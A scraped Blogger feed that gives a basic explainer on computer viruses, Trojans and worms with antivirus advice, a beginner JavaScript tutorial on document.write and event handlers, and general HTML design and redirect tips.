</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span><span><span class="IL_SPAN">Computer</span> viruses attack the </span><span class="IL_SPAN">software</span><span> of a<span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">computer</span> such as operating systems, data files, application </span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">software</span><span>, and e-mails. However, viruses do not affect the <span class="IL_SPAN">computer</span>hardware.</span></span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span><span>Viruses infect computers and spread themselves using various methods. Some viruses attach themselves to a common program such as a popular game or word processor. When a person downloads the infected game and runs it, the attached <span class="IL_SPAN">virus</span> program gets executed. The <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">virus</span> then loads itself into memory and searches for any other program on the disk. If the<span class="IL_SPAN">virus</span> finds any program, it modifies the program by adding the malicious code to the program. The next time this program gets executed, it infects other </span><span class="IL_SPAN">programs</span>, and the cycle continues thereafter.</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>There are many types of <span class="IL_SPAN">computer</span><span> viruses such as a boot-sector <span class="IL_SPAN">virus</span>, macro <span class="IL_SPAN">virus</span>, e-mail <span class="IL_SPAN">virus</span>, etc.</span></span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span><span>A boot-sector <span class="IL_SPAN">virus</span> infects the boot record on hard disks and floppy disks, which is used to start the</span><span class="IL_SPAN">computer</span>. When the <span class="IL_SPAN">computer</span><span> is turned on or restarted, the <span class="IL_SPAN">virus</span> is automatically executed. An infected boot disk may stop the </span><span class="IL_SPAN">computer</span> from starting up.</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>A macro <span class="IL_SPAN">virus</span> is a macro or script that attaches itself to a file or template. When the file is loaded, the instructions of the macro or script are executed.</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>An e-mail <span class="IL_SPAN">virus</span> moves around in e-mail messages, and usually replicates itself by automatically mailing itself to many people in the their e-mail address book.</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>Some other types of <span class="IL_SPAN">programs</span> are also harmful to computers, which are not viruses such as a Trojan horse.</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>The main difference between a <span class="IL_SPAN">virus</span> and a Trojan horse program is that a Trojan horse program does not replicate itself. A Trojan horse only destroys information on the hard disk. A Trojan horse program disguises itself as a legitimate program such as a game or utility. It often looks and initially acts in the same way as a legitimate program, but when it is executed, it destroys or corrupts data. A Trojan horse program can contain viruses, but it is not a <span class="IL_SPAN">virus</span> itself.</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>A Worm uses <span class="IL_SPAN">computer</span> networks and security holes to replicate itself. A Worm scans the network for another <span class="IL_SPAN">computer</span> that has a specific security hole. It copies itself to the new <span class="IL_SPAN">computer</span><span> using the security hole, and then starts replicating from there as well. A <span class="IL_SPAN">virus</span> can have both <span class="IL_SPAN">virus</span> and worm characteristics.</span></span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>There are several anti-virus <span class="IL_SPAN">software</span> that can detect, identify, and remove these viruses. As a precaution against viruses, we should take the following actions:</span><br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>An anti-virus <span class="IL_SPAN">software</span><span> that can detect, identify, and remove viruses should be installed on the <span class="IL_SPAN">computer</span>.</span></span><br />
<span>All information downloaded from the Internet or some unknown resource must be immediately scanned for viruses by using an anti-virus <span class="IL_SPAN">software</span>.</span><br />
Any e-mail attachment that comes from unknown sources should never be opened.<br />
<br />
About the Author:<br />
</div><div style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 9pt; line-height: 15px;"><span>uCertify was formed in 1996 with an aim to offer high quality educational training <span class="IL_SPAN">software</span><span><span><span> and services in the field of information technology to its customers. uCertify provides <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">exam preparation</span> solutions for the</span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">certification exams</span> of </span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">Microsoft</span>, CIW, CompTIA, Oracle, Sun and other leading IT vendors. To know more about uCertify, please visit </span></span><a href="http://www.ucertify.com/" style="color: #335689; text-decoration: none;">http://www.ucertify.com/</a><br />
</div><br />
<div><br />
</div><div><span style="font-family: Arial; font-size: small;"><span class="Apple-style-span" style="font-size: 13px;"><br />
</span></span></div><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-77605298801655760322009-10-20T00:39:00.000-07:002009-10-20T00:39:05.304-07:00JavaScript code tips<span class="Apple-style-span" style="font-family: verdana, arial, sans-serif; font-size: 12px;"></span><br />
<h1 style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;">JavaScript Tutorial: An Introduction to JavaScript</h1><div><h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;">Introduction</h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">JavaScript is a programming language that was designed for the web. Many people don't understand that JavaScript is not the same as Java, the programming language. In fact, Java and JavaScript couldn't be more different. Java is very complicated, JavaScript is not. Regardless of popular belief, JavaScript is not a condensed version of Java in any way. One has nothing to do with the other.<br />
<br />
JavaScript can be used to manipulate your webpages to perform a variety of functions. Some of the applications are purely functional, while others are just fun. In fact, you don't have to know any JavaScript at all, because there are numerous scripts out there that you can simply grab and paste into your HTML code.<br />
<br />
But at the same time, if you want the JavaScript to be effective, and to do what you want it to do, you do need to at least have a basic understanding of JavaScript, how it is written, and how it works. This tutorial will provide that information for you, starting with the very basics, and then working into a few advanced topics. A working knowledge of the basics is necessary.<br />
<br />
You do not, however, need to know HTML to learn JavaScript. It does help, but it isn't necessary since JavaScript doesn't use HTML, even though it is used with HTML. You do need to know how to work with your HTML documents, however, because you will be pasting your scripts into the HTML code, and you will need to know where to place the JavaScript. You do not need to know any programming language to learn JavaScript. The entire concept and writing of JavaScript is really quite simple.</span><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;">What Can I Do With JavaScript?</h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">As stated earlier, you can use JavaScript to perform a variety of functions on your website. Some of the functions are just functional, while the others are more fun in nature, providing interactivity for your website visitors.<br />
<br />
Face it. Nobody likes stale webpages that just sit there. They want to interact with them dynamically. JavaScript allows this to happen. JavaScript reacts to users actions in most cases. For instance, if the user moves their mouse over some text or a graphic, JavaScript can perform a rollover and make that graphic or text change to something else.<br />
<br />
JavaScript can provide functionality, such as password protection, browser detection, or display information, such as the correct time and date on a webpage. JavaScript can be used to give the website designer more control over a user's browser, and how that browser sees the webpages. There are literally millions of things one can do with JavaScript.</span><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;">What Do I Need To Write JavaScript?</h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">Your own web browser must support JavaScript. If it doesn't, you won't be able to tell if your scripts work. Newer versions of both Microsoft Internet Explorer and Netscape both support JavaScript.<br />
<br />
You can write your JavaScript using any plain text editor, or you can write them directly into your HTML documents. It is of course better to use a plain text editor so that you don't accidentally mess up any of your HTML coding. An example of a plain text editor is Microsoft's Notepad.<br />
<br />
The only other thing that is required to write JavaScript is a working knowledge of JavaScript, which you will have as you work through this tutorial!</span><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><h1 style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;"> The Basics of JavaScript</h1><div><span name="KonaBody">There are many terms that you will have to learn when it comes to JavaScript. However, you don't have to learn them right now, before you do any scripting. It is easier to learn the terms as you go along, as this will give you a greater understanding of them. So, we will not be throwing terms out there to confuse or frighten you. However, there are terms that you will need to know - and will come to know - and they need to be noted before you can go any further.<br />
<br />
With that said, the first thing you need to know is that JavaScript 'thinks' in terms of objects. DOM, which stands for Document Object Model is the foundation of JavaScript. Don't panic. Just focus on the word object. You know what an object is. It's a thing. Your computer is an object. Your desk is an object. Let's look into the computer screen, and you will see other objects. A browser window is an object. A web page is a document, and a document is an object. A graphic on a web page is an object.<br />
<br />
As you can see, many objects contain other objects. For instance, the desk contains the computer, which contains the web browser window, which contains the web page, which contains the graphics.<br />
<br />
Now, each object has properties. For instance, a web page has a background color, and it uses a certain font. These are properties. But, the background color could also be considered an object, with the property being the actual color. Don't feel confused. For now, all you need to know is that there are objects and objects have properties.<br />
<br />
JavaScripts cause actions to occur on or with objects. These actions are called methods. These methods may be referred to as functions. Functions are methods that you set up to perform a certain task. Method and Function are pretty much interchangeable in this way.<br />
<br />
There are just a few more terms to note. Don't run away! In JavaScript, we also have events, and event handlers. An event is something that happens. In the world of JavaScript, an event is usually something that the website visitor did, such as moving their mouse over a link. That is an event. An event handler comes into play when the event occurs. The event occurs and the event handler calls a JavaScript or reaction into play.<br />
<br />
You will learn some other important terms as you go along. Remember, you don't have to cram all of this into your head right now. These are the basic terms that relate to JavaScript, and you will get to know them as you move forward in this tutorial.<br />
<br />
So, let's move forward and write our first JavaScript.</span><br />
</div><div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">Open your NotePad or favorite text editor, and let's get started. The first thing you are going to learn is how to make JavaScript write something to your HTML document. Within your text editor, write or copy and paste the following script:</span><br />
<br />
</div><table align="Center" border="" bordercolor="#4284D6" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><script type="text/javascript">
<!--
document.write("<i>HI Everybody!</i>");
//-->
</script></td></tr>
</tbody></table><br />
<h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;"></h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
<span name="KonaBody">This script will write the words, HI Everybody on your webpage. Now, this is a very simple script, and you can use HTML to write words on your page, but the basis of this script will be very important later on, so it is important to learn this one. Let's look at each element of the script.<br />
<br />
First, we are telling the web browser that it is about to see and interpret JavaScript with this tag:</span><br />
<br />
</div><table align="Center" border="" bordercolor="#4284D6" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><script type="text/javascript">
</td></tr>
</tbody></table></p><p style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">
<span name="KonaBody">This is an important tag. The browser needs to know what it is about to see. The next part is really important as well. You see, not all browsers recognize JavaScript for what it is. They just see it as text that should be printed on a page, as it is. You have to prevent this from happening, by hiding the JavaScript from older browsers. This is done by using HTML comment tags, as seen below:</span>
<table border="" bordercolor="#4284D6" cellspacing="0" cellpadding="2" align="Center" width="100%"><tbody>
<tr><td bgcolor="#EAE8E8" style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); "><!--Comment --></td></tr>
</tbody></table></p><h2 style="font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left; color: navy; ">
</h2><p style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">
<span name="KonaBody">Now, with the JavaScript hidden inside the comment tag, older browsers will ignore it, but newer browsers will see it for what it is, and if the browser is JavaScript enabled, it will run the script. If the browser is not JavaScript enabled, nothing will happen.
The next part of our script is:</span>
<table border="" bordercolor="#4284D6" cellspacing="0" cellpadding="2" align="Center" width="100%"><tbody>
<tr><td bgcolor="#EAE8E8" style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">document.write</td></tr>
</tbody></table></p><h2 style="font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left; color: navy; ">
</h2><p style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">
<span name="KonaBody">The document is an object. We discussed this earlier, remember? Write is the method (or function) that we want to use on the document. It is presented with a period between the two words: document.write. The write method is actually presented as write() with what you want written inside the parentheses.
The text that we want written is called a string in JavaScript, and it is therefore enclosed in quotation marks. It is presented as this:</span>
<table border="" bordercolor="#4284D6" cellspacing="0" cellpadding="2" align="Center" width="100%"><tbody>
<tr><td bgcolor="#EAE8E8" style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">(<i>"HI Everybody!"</i>)</td></tr>
</tbody></table></p><h2 style="font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left; color: navy; ">
</h2><p style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">
<span name="KonaBody">Note that we have also added a little HTML into the mix with the use of tags that will force the text to be printed in italics. We've written the object, the method, and the string so that now the script has everything it needs to run. We've also closed or ended the comment, and then the script with the following:</span>
<table border="" bordercolor="#4284D6" cellspacing="0" cellpadding="2" align="Center" width="100%"><tbody>
<tr><td bgcolor="#EAE8E8" style="font-family: verdana, arial, sans-serif; font-size: 12px; color: rgb(0, 0, 0); ">//-->
</script></td></tr>
</tbody></table><br />
<h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;"></h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
<span name="KonaBody">Congratulations! You've written your first JavaScript, and it is the basis for so many other wonderful things that can be done with JavaScript. Be sure that you paste this code into an HTML document, and load it up to your web server so you can see how it works.</span><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">As stated in the previous lesson, if a user's browser is not JavaScript enabled, the script can't run. Often, nothing will happen, but it is possible that the user will get error reports. This can be prevented by using the <noscript> JavaScript tag. It looks like this:<br />
<br />
</noscript></span><br />
</div><table align="Center" border="" bordercolor="#4284D6" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><noscript><br />
Your Browser Does Not Support JavaScript<br />
</noscript></td></tr>
</tbody></table><br />
<h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;"></h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
<span name="KonaBody">So far, you have learned about objects, methods, and strings. You have learned how to write a very basic JavaScript, and you have learned how to hide JavaScript from old browsers, and how to handle browsers that do not have JavaScript enabled. Let's take a closer look at events now.</span><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><h1 style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;">JavaScript Events</h1><div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">An event is something that happens. Events in JavaScript usually happen when a website visitor, or user, does something. It may be something as simple as moving the mouse. When events happen, Event Handlers react to the events. For instance, when you click a link on a web page, an event handler takes you to the link that has been specified.<br />
<br />
Event handlers often use variables and methods to perform the task that they have been told to do. Event handlers are assigned to objects in the HTML code. In our example above, there was no event. The words appeared on the web page when it was loaded. The user didn't have to take any action, other than arriving on the web page.<br />
<br />
Let's write another JavaScript. This will be an event:</span><br />
<br />
</div><table align="Center" border="" bordercolor="#4284D6" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><a href="http://www.yourwebpage.com/" onmouseover="window.status='Return to Homepage'; return true">Home</a></td></tr>
</tbody></table><br />
<h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;"></h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
<span name="KonaBody">Now this script will change the status bar of the browser window when the user puts their mouse over the link on the page. Let's look at the elements.<br />
<br />
First, we designate the URL, which is http://www.yourwebpage.com, and we use common HTML for this, so that the code looks like:</span><br />
<br />
</div><table align="Center" border="" bordercolor="#4284D6" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><a href="http://www.yourwebpage.com/">Home</a></td></tr>
</tbody></table><br />
<h2 style="color: navy; font-family: arial, verdana, sans-serif; font-size: 16px; font-weight: bold; text-align: left;"></h2><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
<span name="KonaBody">But what we did to turn this into JavaScript is add additional information to the <a href="http://www.blogger.com/post-create.g?blogID=2254663475743620910"> tag. The tag above, the HTML for a link, is our object. The first JavaScript element we added was onMouseOver. This is the event handler. The event is when the user actually moves the mouse over the link for Home.</a></span><a href="http://www.blogger.com/post-create.g?blogID=2254663475743620910"><br />
</a><br />
</div><a href="http://www.blogger.com/post-create.g?blogID=2254663475743620910"><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span name="KonaBody">Another user driven event handler is onClick. Just as it sounds, this event handler wakes up and starts doing things when a user clicks on a specified object. Aside from learning about the onClick event handler, you are also about to learn how to generate a button to go along with it. Here is the code:</span><br />
<br />
</div><table align="Center" border="" bordercolor="#4284D6" cellpadding="2" cellspacing="0"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><button onclick="window.alert('Life Is Good!'); return false;">Click It!</button></td></tr>
</tbody></table><br />
<div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
<span name="KonaBody">We have a new element here - a button tag. When the button is clicked (event), the onClick (event handler) will create an alert box (object) which will say Life is good (string). We've made sure the button will simply say Click It! Now, note that we've said that the alert box is an object. It is - but so is window. In this case, the window is an object, and alert is both a method and an object.<br />
<br />
By now, these JavaScript terms should be coming to you more easily, and you should be able to recognize some of them for what they are in the code. Let's learn a new term, which is unLoad. This is an event handler, and the event is when a page is closed, or left by the user. When the web page unloads in the browser window, something will be triggered. This is often used to open popup windows and such.<br />
<br />
Other common event handlers are onBlur, onFocus, onSelect, and onChange. These event handlers are usually used with HTML forms, such as forms that users fill out on your website.<br />
<br />
Let's first look at onFocus and onBlur. When a user interacts with a web page, the browser that is displaying that page focuses on what the user is doing. Users interact with web pages by using the mouse. When a user clicks a link, that link has the web browsers focus.<br />
<br />
Look at it this way: A user comes to your page. They type something into a form on your page. That form's input box has the focus of the browser. The user hits the submit button for that form. The input box loses focus, and this is called onBlur in JavaScript terms. The focus is now on the button, which is onFocus.<br />
<br />
The event handler onChange comes into action when the user changes something on the page, such as the text in an input box. The other event handler, onSelect, comes to life when the user selects something. For instance, they might select an option with a radio button.<br />
<br />
There are numerous other event handlers that can be used to increase the Interactivity of a user with a web page. For instance, if you have an image of a button on your webpage, you can use the onClick event handler with the mouseDown and mouseUp event handlers. This combination will make a graphic appear to be depressed when someone clicks the mouse down on it, and rise back up when they release the mouse button.<br />
<br />
You will see how all of these event handlers are used later on, and you will learn about some additional event handlers as well. Now that you know more about event handlers, let's move on to the next topic, which is a variable.</span><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><br />
</a></div><a href="http://www.blogger.com/post-create.g?blogID=2254663475743620910"><br />
<br />
</a></div><a href="http://www.blogger.com/post-create.g?blogID=2254663475743620910"><br />
<br />
<br />
</a></div><a href="http://www.blogger.com/post-create.g?blogID=2254663475743620910"><br />
</a><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-19876963412787092282009-10-20T00:31:00.000-07:002009-10-20T00:31:28.733-07:00html code tips<span style="font-family: verdana, arial, sans-serif;"><span style="font-size: x-large;"><span style="color: #990000;"><br />
</span></span></span><br />
<span style="font-family: verdana, arial, sans-serif;"><span style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial; white-space: pre;"><span style="font-size: x-large;"><span style="color: #990000;">html code tips</span></span></span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: 12px;">When you begin designing your HTML web pages, you may find that many HTML courses fall short when it comes to providing you with special effect HTML codes and tips.<br />
<br />
However, there are many special effect HTML codes that will enable you to enhance your visitors experience tremendously.<br />
<br />
When trying to decide what HTML codes to use within your web pages, keep in mind, if it doesn't enhance your web page, it's probably best to leave it out, as the more special effects you add to your page, the longer your page will take to load.<br />
<br />
In addition, prior to using any of these HTML codes and tips within your web pages, you must ensure that the effect you're trying to achieve doesn't irritate your visitors.<br />
<br />
For example, using HTML codes that load web pages within web pages may crash your visitors browser. In addition, using excessive pop up windows, frames and placing scrolling text within the status bar can be very irritating and cause your visitors to leave your web site and never return.<br />
<br />
Please ensure you select your special HTML codes very carefully and use them to your fullest advantage.<br />
<br />
<strong>Web Design Mistakes</strong> </span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;">Confusing<br />
Pop up messages<br />
Poor load time<br />
Over use of Java<br />
Poor overall appearance<br />
Poor use of HTML tables<br />
Spelling/Grammar mistakes<br />
Poor organization<br />
Inconsistent page design<br />
No contact information<br />
No 'about us' page<br />
No privacy policy<br />
Different backgrounds on each page<br />
Poor content<br />
Poor navigation<br />
Over powering music set to auto play<br />
Broken HTML code links and graphics<br />
Poor browser compatibility<br />
Large slow loading graphics<br />
Too many graphics<br />
Large Welcome banners<br />
Flashing banners<br />
Pages scrolling to oblivion<br />
Multiple colored text<br />
Multiple use of animated graphics<br />
Text difficult to read<br />
Animated bullets<br />
No Meta tags<br />
Too many graphic and/or line dividers<br />
Multiple use of different fonts<br />
Under construction signs<br />
Busy, distracting backgrounds<br />
Scrolling text in the status bar<br />
Multiple banners and buttons<br />
Large scrolling text across the page<br />
Poor use of HTML code frames<br />
Large fonts<br />
Poor use of mouse over effect<br />
<br />
<br />
When you begin designing your web site, try to keep your main HTML page as small as possible. For example, instead of trying to cram all your information into a single web page, consider creating sections for your content. These sections can contain highlights of your content with a link to further information. You can set up your content sections in HTML tables with colored heading sections for information, such as articles, products or whatever you'd like.<br />
<br />
To keep your main HTML page smaller, it is much better to keep it down to the most essential elements. You can then use links to additional pages to provide the detailed information. A good rule of thumb is<i>Less is More</i>.<br />
<br />
To enhance your web page, you can format your text using bold headlines, colored HTML table cells, and graphic bullets and/or arrows.<br />
<br />
If you use the same graphic bullets and arrows throughout your page, you can enhance your page's appearance, but you won't add any additional time to your web page load time. When you reuse an image, your image only has to load once. When the image has loaded, it will instantly be displayed in all of the other locations.<br />
<br />
If you're looking for some HTML codes and tips to spice up your web site, you've come to the right place. You will find a variety of HTML codes and tips below. Simply click on the links and copy and paste the codes into your web page according to the instructions.</span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"><br />
</span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"><br />
</span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: 12px;"></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: 12px;"></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: 12px;"></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: 12px;"><h1 align="Center" style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;"><span style="font-family: Arial, Helvetica;">Embedding Web Pages within Web Pages</span></h1></span><span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;">if you're looking for a way to display a web page within a web page, this HTML code may be just what you're looking for.<br />
<br />
As you can see in the example below, we are displaying a web page within the web page that you are viewing right now.<br />
<br />
This HTML code will enable you to display rotating tips, images or whatever you'd like.<br />
<br />
Copy and paste the code below into your web page where you would like to embed the additional page</span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"><br />
</span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"><br />
</span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;">If you need to redirect your visitors to a new page, this HTML redirect code may be just what you're looking for.<br />
<br />
When designing a web site, many times you must change the location of a web page. However, if the page is popular, your visitors may have already linked to it. In addition, the Search Engines have most-likely already indexed the page.<br />
<br />
For this reason, it is best to replace your page with a new page that will redirect your visitors to the new page. This provides a great way to provide your visitors with the information they were looking for and prevent you from losing your traffic.<br />
<br />
However, when using this HTML redirect code, please ensure that you don't use it to trick the Search Engines, as this could get your web site banned. It is always best to work hard and learn quality ways in which to drive traffic to your web site.<br />
<br />
Place the following HTML redirect code between the and tags of your HTML code.<br />
<br />
</span></span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"></span></span><br />
<span style="font-family: verdana, arial, sans-serif; font-size: small;"><span style="font-size: 12px;"><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><br />
<center><br />
<table align="Center" border="0" cellpadding="4"><tbody>
<tr><td bgcolor="#EAE8E8" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;"></span><br />
</td></tr>
</tbody></table><div style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><br />
</div><div align="Left" style="color: black; font-family: verdana, arial, sans-serif; font-size: 12px;"><span style="font-family: Arial, Helvetica; font-size: x-small;">The above HTML redirect code will redirect your visitors to another web page instantly. The content="0; may be changed to the number of seconds you want the browser to wait before redirecting.</span><br />
</div><br />
</center> <div><br />
</div><div><br />
</div><h1 align="Center" style="color: navy; font-family: Georgia; font-size: 24px; font-weight: bold; text-align: center;"><span style="font-family: Arial, Helvetica;">Adding Color To Your HTML Web Page Table Background</span></h1><div><table border="0" cellpadding="4" cellspacing="0"><tbody>
